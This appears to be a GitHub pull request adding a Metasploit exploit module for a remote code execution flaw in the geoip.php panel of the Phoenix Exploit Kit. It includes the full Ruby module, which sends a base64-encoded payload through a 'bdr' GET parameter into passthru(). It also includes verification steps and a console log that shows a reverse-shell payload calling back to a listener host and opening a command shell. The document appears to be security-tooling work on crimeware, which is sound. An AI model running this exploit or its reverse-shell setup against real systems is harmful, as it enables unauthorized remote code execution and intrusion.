### PR TITLE
Add Phoenix Exploit Kit Remote Code Execution

### DIFF
--- a/modules/exploits/multi/http/phoenix_exec.rb
+++ b/modules/exploits/multi/http/phoenix_exec.rb
@@ -1,0 +1,84 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'           => 'Phoenix Exploit Kit Remote Code Execution',
+      'Description'    => %q{
+        This module exploits a Remote Code Execution in the web panel of Phoenix Exploit Kit Remote Code Execution via the
+        geoip.php. The Phoenix Exploit Kit is a popular commercial crimeware tool that probes the browser of the visitor for
+        the presence of outdated and insecure versions of browser plugins like Java, and Adobe Flash and Reader which then
+        silently installs malware.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'CrashBandicot @DosPerl', #initial discovery
+          'Jay Turla <@shipcod3>', #msf module
+        ],
+      'References'     =>
+        [
+          [ 'EDB', '40047' ],
+          [ 'URL', 'http://krebsonsecurity.com/tag/phoenix-exploit-kit/' ], # description of Phoenix Exploit Kit
+          [ 'URL', 'https://www.pwnmalw.re/Exploit%20Pack/phoenix' ],
+        ],
+      'Privileged'     => false,
+      'Payload'        =>
+        {
+          'Space'    => 200,
+          'BadChars' => '',
+          'DisableNops' => true,
+          'Compat'      =>
+            {
+              'PayloadType' => 'cmd'
+            }
+        },
+      'Platform'       => %w{ unix win },
+      'Arch'           => ARCH_CMD,
+      'Targets'        =>
+        [
+          ['Phoenix Exploit Kit / Unix', { 'Platform' => 'unix' } ],
+          ['Phoenix Exploit Kit / Windows', { 'Platform' => 'win' } ]
+        ],
+      'DisclosureDate' => 'Jun 06 2016',
+      'DefaultTarget'  => 0))
+
+    register_options(
+      [
+        OptString.new('TARGETURI', [true, 'The path of geoip.php which is vulnerable to RCE', '/Phoenix/includes/geoip.php']),
+      ],self.class)
+  end
+
+  def check
+    test = Rex::Text.rand_text_alpha(8)
+    res = http_send_command("echo #{test};")
+    if res && res.body.include?(test)
+      return Exploit::CheckCode::Vulnerable
+    end
+    return Exploit::CheckCode::Safe
+  end
+
+  def exploit
+    encoded = Rex::Text.encode_base64(payload.encoded)
+    http_send_command("passthru(base64_decode(\"#{encoded}\"));")
+  end
+
+  def http_send_command(cmd)
+    send_request_cgi({
+      'method'   => 'GET',
+      'uri'      => normalize_uri(target_uri.path),
+      'vars_get' => {
+        'bdr' => cmd
+      }
+    })
+  end
+end

--- a/modules/exploits/multi/http/phoenix_exec.rb
+++ b/modules/exploits/multi/http/phoenix_exec.rb
@@ -14,10 +14,10 @@ class MetasploitModule < Msf::Exploit::Remote
     super(update_info(info,
       'Name'           => 'Phoenix Exploit Kit Remote Code Execution',
       'Description'    => %q{
-        This module exploits a Remote Code Execution in the web panel of Phoenix Exploit Kit Remote Code Execution via the
-        geoip.php. The Phoenix Exploit Kit is a popular commercial crimeware tool that probes the browser of the visitor for
-        the presence of outdated and insecure versions of browser plugins like Java, and Adobe Flash and Reader which then
-        silently installs malware.
+        This module exploits a Remote Code Execution in the web panel of Phoenix Exploit Kit via the geoip.php. The
+        Phoenix Exploit Kit is a popular commercial crimeware tool that probes the browser of the visitor for the
+        presence of outdated and insecure versions of browser plugins like Java, and Adobe Flash and Reader which
+        then silently installs malware.
       },
       'License'        => MSF_LICENSE,
       'Author'         =>

--- a/modules/exploits/multi/http/phoenix_exec.rb
+++ b/modules/exploits/multi/http/phoenix_exec.rb
@@ -49,7 +49,7 @@ class MetasploitModule < Msf::Exploit::Remote
           ['Phoenix Exploit Kit / Unix', { 'Platform' => 'unix' } ],
           ['Phoenix Exploit Kit / Windows', { 'Platform' => 'win' } ]
         ],
-      'DisclosureDate' => 'Jun 06 2016',
+      'DisclosureDate' => 'July 01 2016',
       'DefaultTarget'  => 0))
 
     register_options(

--- a/modules/exploits/multi/http/phoenix_exec.rb
+++ b/modules/exploits/multi/http/phoenix_exec.rb
@@ -35,7 +35,6 @@ class MetasploitModule < Msf::Exploit::Remote
       'Payload'        =>
         {
           'Space'    => 200,
-          'BadChars' => '',
           'DisableNops' => true,
           'Compat'      =>
             {

--- a/modules/exploits/multi/http/phoenix_exec.rb
+++ b/modules/exploits/multi/http/phoenix_exec.rb
@@ -49,7 +49,7 @@ class MetasploitModule < Msf::Exploit::Remote
           ['Phoenix Exploit Kit / Unix', { 'Platform' => 'unix' } ],
           ['Phoenix Exploit Kit / Windows', { 'Platform' => 'win' } ]
         ],
-      'DisclosureDate' => 'July 01 2016',
+      'DisclosureDate' => 'Jul 01 2016',
       'DefaultTarget'  => 0))
 
     register_options(


### PR DESCRIPTION
## Verification
- [x] Use this [source code](https://github.com/shipcod3/IRC-Bot-Hunters/blob/master/malicious_samples/geoip.php) for your target and place it under `/Phoenix/includes/geoip.php`
- [x] Start `msfconsole`
- [x] `use exploit/multi/http/phoenix_exec`
- [x] `set rhost <ip>`
- [x] `set rport <port>`
- [x] `exploit` and get the shell
## Description

This module exploits a Remote Code Execution in the web panel of Phoenix Exploit Kit via the geoip.php. The Phoenix Exploit Kit is a popular commercial crimeware tool that probes the browser of the visitor for the presence of outdated and insecure versions of browser plugins like Java, and Adobe Flash and Reader which then silently installs malware.

```
msf exploit(phoenix_exec) > show options

Module options (exploit/multi/http/phoenix_exec):

   Name       Current Setting              Required  Description
   ----       ---------------              --------  -----------
   Proxies                                 no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST      192.168.52.128               yes       The target address
   RPORT      80                           yes       The target port
   SSL        false                        no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /Phoenix/includes/geoip.php  yes       The path of geoip.php which is vulnerable to RCE
   VHOST                                   no        HTTP server virtual host


Payload options (cmd/unix/reverse):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.52.129   yes       The listen address
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Phoenix Exploit Kit / Unix


msf exploit(phoenix_exec) > check
[+] 192.168.52.128:80 The target is vulnerable.
msf exploit(phoenix_exec) > exploit

[*] Started reverse TCP double handler on 192.168.52.129:4444 
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo RZpbBEP77nS8Dvm4;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket A
[*] A: "RZpbBEP77nS8Dvm4\r\n"
[*] Matching...
[*] B is input...
[*] Command shell session 5 opened (192.168.52.129:4444 -> 192.168.52.128:51748) at 2016-08-19 09:29:22 -0400

uname -a
Linux ubuntu 4.4.0-28-generic #47-Ubuntu SMP Fri Jun 24 10:08:35 UTC 2016 i686 i686 i686 GNU/Linux
```

![image](https://cloud.githubusercontent.com/assets/3483615/17811299/90260d12-6654-11e6-8ec9-b6228f0a6104.png)

geoip.php source code: https://github.com/shipcod3/IRC-Bot-Hunters/blob/master/malicious_samples/geoip.php
